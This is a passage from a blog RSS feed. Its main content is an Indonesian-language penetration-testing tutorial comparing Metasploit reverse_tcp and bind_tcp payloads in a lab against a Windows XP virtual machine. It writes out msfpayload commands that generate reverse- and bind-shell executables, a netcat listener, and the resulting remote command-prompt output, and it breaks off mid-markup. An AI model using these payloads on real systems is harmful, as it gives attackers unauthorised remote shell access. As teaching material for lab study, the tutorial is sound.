auto;"&gt;&lt;span class="Apple-style-span" style="line-height: 18px;"&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;root@revolution&lt;/span&gt;&lt;span class="Apple-style-span" style="color: lime;"&gt;:&lt;/span&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;/&lt;/span&gt;&lt;span class="Apple-style-span" style="color: lime;"&gt;#&lt;/span&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;&amp;nbsp;&lt;/span&gt;&lt;span class="Apple-style-span" style="color: lime;"&gt;ifconfig wlan0 | grep "inet addr:" | awk '{print $2}'| sed 's/addr://'&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span class="Apple-style-span" style="line-height: 18px;"&gt;&lt;span class="Apple-style-span" style="color: white;"&gt;192.168.1.7&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;b&gt;Excellent!&lt;/b&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;b&gt;Created by : &lt;span class="Apple-style-span" style="color: red;"&gt;red-dragon&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4322924474312123143-5401478744343149953?l=www.root-bt.co.cc' alt='' /&gt;&lt;/div&gt;</description><link>http://www.root-bt.co.cc/2012/01/do-more-with-cli-part-1.html</link><author>noreply@blogger.com (Double Dragon)</author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/-IrC2OyERSV8/TyOI_7xQ4oI/AAAAAAAABLM/8RJsmO9NgO8/s72-c/1.png' height='72' width='72'/><thr:total>2</thr:total></item><item><guid isPermaLink='false'>tag:blogger.com,1999:blog-4322924474312123143.post-1375648537845213473</guid><pubDate>Wed, 18 Jan 2012 10:56:00 +0000</pubDate><atom:updated>2012-01-18T17:56:21.481+07:00</atom:updated><category domain='http://www.blogger.com/atom/ns#'>Penetration Test</category><category domain='http://www.blogger.com/atom/ns#'>payload</category><category domain='http://www.blogger.com/atom/ns#'>exploitation</category><category domain='http://www.blogger.com/atom/ns#'>netcat</category><title>Perbedaan Reverse TCP dan Bind TCP</title><description>Pengguna metasploit untuk tingkat pemula, mungkin pernah bertanya-tanya. Apa perbedaan payload reverse_tcp dengan payload bind_tcp? Sederhananya, reverse adalah perintah dari attacker kepada korban, untuk menghubungi korban. Sementara bind tcp adalah perintah dari attacker kepada korban, untuk membuka akses kepada attacker. Ilustrasinya seperti ini&lt;span class="fullpost"&gt; &lt;/span&gt;&lt;br /&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;b&gt;[reverse_tcp]&lt;/b&gt;&lt;/div&gt;&lt;div&gt;attacker -&amp;gt; [hubungi saya di port 4444] -&amp;gt; victim&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;setelah payload dieksekusi&lt;/div&gt;&lt;div&gt;attacker &amp;lt;-&amp;gt; [port 4444] &amp;lt;-&amp;gt; victim&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;b&gt;[bind_tcp]&lt;/b&gt;&lt;/div&gt;&lt;div&gt;attacker -&amp;gt; [buka jalan untuk saya di port 4444] -&amp;gt; victim&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;setelah dieksekusi&lt;/div&gt;&lt;div&gt;attacker &amp;lt;-&amp;gt; [port 4444] &amp;lt;-&amp;gt; victim&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Untuk membuktikannya, saya akan mengadakan percobaan mengenai payload. Anda bisa mencoba sendiri di rumah.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;b&gt;Tools requirements:&lt;/b&gt;&lt;/div&gt;&lt;div&gt;[*] msfpayload &lt;i&gt;&lt;span class="Apple-style-span" style="color: lime;"&gt;dapat ditemukan di backtrack 5&lt;/span&gt;&lt;/i&gt;&lt;/div&gt;&lt;div&gt;[*] netcat &lt;i&gt;&lt;span class="Apple-style-span" style="color: lime;"&gt;dapat ditemukan di backtrack 5&lt;/span&gt;&lt;/i&gt;&lt;/div&gt;&lt;div&gt;[*] vmware player&lt;/div&gt;&lt;div&gt;[*] windows XP SP 2&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;b&gt;System requirements:&lt;/b&gt;&lt;/div&gt;&lt;div&gt;[*] VMware menggunakan koneksi NAT&lt;/div&gt;&lt;div&gt;[*] IP address attacker vmnet8 10.10.10.1&lt;/div&gt;&lt;div&gt;[*] IP address victim vmnet8 10.10.10.128&lt;/div&gt;&lt;div&gt;[*] Windows XP di dalam vmware telah terinstall vmware tools&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;b&gt;Walk-through:&lt;/b&gt;&lt;/div&gt;&lt;div&gt;&lt;a name='more'&gt;&lt;/a&gt;&lt;/div&gt;&lt;div&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="color: cyan; font-size: large;"&gt;1. Buat PAYLOAD windows/shell_reverse_tcp&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Buka terminal, kemudian masukan perintah:&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;div class="title" style="background-color: black; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; color: green; font-family: Verdana, Arial, sans-serif; font-size: 13px; font-weight: bold; line-height: 18px; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px; text-align: left;"&gt;Command:&lt;/div&gt;&lt;div class="body" dir="ltr" style="background-color: black; text-align: left;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span class="Apple-style-span" style="color: green;"&gt;&lt;span class="Apple-style-span" style="line-height: 18px;"&gt;root@revolution:~# msfpayload windows/shell_reverse_tcp LHOST=10.10.10.1 LPORT=4444 X &amp;gt; /tmp/reverse.exe&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-B1lu-0OPF0c/Txaju7q94pI/AAAAAAAABJg/GdBmlhyd5n0/s1600/payload+reverse.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="176" src="http://4.bp.blogspot.com/-B1lu-0OPF0c/Txaju7q94pI/AAAAAAAABJg/GdBmlhyd5n0/s320/payload+reverse.jpg" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;b&gt;Keterangan:&lt;/b&gt;&lt;/div&gt;&lt;div&gt;[*] saya akan membuat payload windows/shell_reverse_tcp&lt;/div&gt;&lt;div&gt;[*] ip address saya 10.10.10.1&lt;/div&gt;&lt;div&gt;[*] port listener saya tentukan di 4444&lt;/div&gt;&lt;div&gt;[*] payload ini saya simpan di folder /tmp dengan nama reverse.exe&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Buka folder /tmp, kemudian copy file reverse.exe, kemudian paste di windows XP. Kembali ke terminal, kemudian masukan perintah:&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;div class="title" style="background-color: black; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; color: green; font-family: Verdana, Arial, sans-serif; font-size: 13px; font-weight: bold; line-height: 18px; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px; text-align: left;"&gt;Command:&lt;/div&gt;&lt;div class="body" dir="ltr" style="background-color: black; font-family: monospace; text-align: left;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span class="Apple-style-span" style="color: green;"&gt;&lt;span class="Apple-style-span" style="line-height: 18px;"&gt;root@revolution:~# nc -l -v -p 4444&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;b&gt;Keterangan:&lt;/b&gt;&lt;/div&gt;&lt;div&gt;[*] saya menggunakan netcat sebagai handler terhadap koneksi yang masuk&lt;/div&gt;&lt;div&gt;[*] menentukan netcat sebagai listener (-l)&lt;/div&gt;&lt;div&gt;[*] menentukan netcat untuk mengaktifkan verbose mode (-v)&lt;/div&gt;&lt;div&gt;[*] menentukan netcat untuk melakukan listening pada port 4444 (-p 4444)&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Kemudian jalankan file reverse.exe yang ada di windows xp.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Maka ini yang akan terjadi:&lt;/div&gt;&lt;div&gt;&lt;div class="title" style="background-color: black; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; color: green; font-family: Verdana, Arial, sans-serif; font-size: 13px; font-weight: bold; line-height: 18px; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px; text-align: left;"&gt;Command:&lt;/div&gt;&lt;div class="body" dir="ltr" style="background-color: black; text-align: left;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span class="Apple-style-span" style="line-height: 18px;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; color: green; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;root@revolution:~# nc -l -v -p 4444&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; color: green; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;listening on [any] 4444 ...&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; color: green; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;10.10.10.128: inverse host lookup failed: Unknown server error : Connection timed out&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; color: green; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;connect to [10.10.10.1] from (UNKNOWN) [10.10.10.128] 1062&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;Microsoft Windows XP [Version 5.1.2600]&lt;/span&gt;&lt;/b&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;(C) Copyright 1985-2001 Microsoft Corp.&lt;/span&gt;&lt;/b&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;C:\Documents and Settings\User\Desktop&amp;gt;&lt;/span&gt;&lt;/b&gt;&lt;/code&gt;&lt;/span&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-xMoUCCqzNBQ/Txaj5LOMDRI/AAAAAAAABJo/qG1QJdI-SC4/s1600/nc+reverse.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="176" src="http://2.bp.blogspot.com/-xMoUCCqzNBQ/Txaj5LOMDRI/AAAAAAAABJo/qG1QJdI-SC4/s320/nc+reverse.jpg" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;b&gt;FAQ [Frequently Asked Questions]&lt;/b&gt;&lt;/div&gt;&lt;div&gt;[Q] Apa fungsi payload yang kita buat?&lt;/div&gt;&lt;div&gt;[A] Payload yang kita buat, memiliki perintah dari attacker kepada victim untuk menghubungi attacker di port 4444&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;[Q] Mengapa kita mendapatkan command prompt milik victim?&lt;/div&gt;&lt;div&gt;[A] Itu karena payload yang kita buat adalah shell_reverse_tcp, ini berfungsi agar netcat mengeksekusi shell aka command prompt (pada windows) setelah konesi di port 4444 terjadi&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;[Q] Bisakah saya menentukan di port yang berbeda selain 4444?&lt;/div&gt;&lt;div&gt;[A] Bisa, dengan syarat port tersebut sedang tidak digunakan oleh proses lain, misalkan port 80 yang biasa digunakan oleh Apache, atau 22 yang biasa digunakan oleh OpenBSD untuk SSH connection.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="color: cyan; font-size: large;"&gt;2. Buat payload windows/shell_bind_tcp&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Buka terminal, kemudian masukan perintah:&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;div class="title" style="background-color: black; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; color: green; font-family: Verdana, Arial, sans-serif; font-size: 13px; font-weight: bold; line-height: 18px; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px; text-align: left;"&gt;Command:&lt;/div&gt;&lt;div class="body" dir="ltr" style="background-color: black; font-family: monospace; text-align: left;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span class="Apple-style-span" style="line-height: 18px;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; color: green; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;root@revolution:~# msfpayload windows/shell_bind_tcp LPORT=4444 X &amp;gt; /tmp/bind.exe&lt;/code&gt;&lt;/span&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-CjCMQZTAlHU/TxakEl0mOkI/AAAAAAAABJw/eJIaTlIm9eY/s1600/payload+bind.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="176" src="http://1.bp.blogspot.com/-CjCMQZTAlHU/TxakEl0mOkI/AAAAAAAABJw/eJIaTlIm9eY/s320/payload+bind.jpg" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;b&gt;Keterangan:&lt;/b&gt;&lt;/div&gt;&lt;div&gt;[*] Saya akan membuat payload windows/shell_bind_tcp&lt;/div&gt;&lt;div&gt;[*] Saya menentukan 4444 sebagai port listener agar attacker dapat masuk ke system milik victim&lt;/div&gt;&lt;div&gt;[*] Saya menyimpan payload di folder /tmp dengan nama bind.exe&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Buka folder /tmp, kemudian copy bind.exe ke Windows XP. Jangan jalankan file ini terlebih dahulu!&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Buka command prompt windows, kemudian ketik&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;div class="title" style="background-color: black; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; color: green; font-family: Verdana, Arial, sans-serif; font-size: 13px; font-weight: bold; line-height: 18px; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px; text-align: left;"&gt;Command:&lt;/div&gt;&lt;div class="body" dir="ltr" style="background-color: black; font-family: monospace; text-align: left;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span class="Apple-style-span" style="line-height: 18px;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; color: green; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;C:\Documents and Settings\User&amp;gt; netstat -an | find "4444"&lt;/code&gt;&lt;/span&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-xpXpCA6pCeQ/TxakOYgY1nI/AAAAAAAABJ4/IF6TnPPreJI/s1600/netstat+1.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="297" src="http://1.bp.blogspot.com/-xpXpCA6pCeQ/TxakOYgY1nI/AAAAAAAABJ4/IF6TnPPreJI/s320/netstat+1.jpg" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;b&gt;Keterangan:&lt;/b&gt;&lt;/div&gt;&lt;div&gt;[*] netstat adalah perintah command prompt untuk mengecek koneksi yang terjadi dalam sebuah system&lt;/div&gt;&lt;div&gt;[*] saya akan mengecek, apakah port 4444 terbuka&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Terlihat bahwa port 4444 tidak terbuka. Setelah itu, jalankan file bind.exe. Kemudian masukan perintah netstat kembali pada command prompt:&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;div class="title" style="background-color: black; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; color: green; font-family: Verdana, Arial, sans-serif; font-size: 13px; font-weight: bold; line-height: 18px; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px; text-align: left;"&gt;Command:&lt;/div&gt;&lt;div class="body" dir="ltr" style="background-color: black; font-family: monospace; text-align: left;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span class="Apple-style-span" style="line-height: 18px;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; color: green; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;C:\Documents and Settings\User&amp;gt; netstat -an | find "4444"&lt;/code&gt;&lt;/span&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-5aNMUlUGrG8/Txakl7KGGqI/AAAAAAAABKA/-HyDGiJjSWA/s1600/netstat+2.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="297" src="http://2.bp.blogspot.com/-5aNMUlUGrG8/Txakl7KGGqI/AAAAAAAABKA/-HyDGiJjSWA/s320/netstat+2.jpg" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Terlihat bahwa sekarang muncul port 4444 yang melakukan listening terhadap koneksi. Kali ini kita akan menggunakan netcat untuk mendapatkan command prompt milik victim.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;div class="title" style="background-color: black; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; color: green; font-family: Verdana, Arial, sans-serif; font-size: 13px; font-weight: bold; line-height: 18px; margin-bottom: 4px; margin-left: 0px; 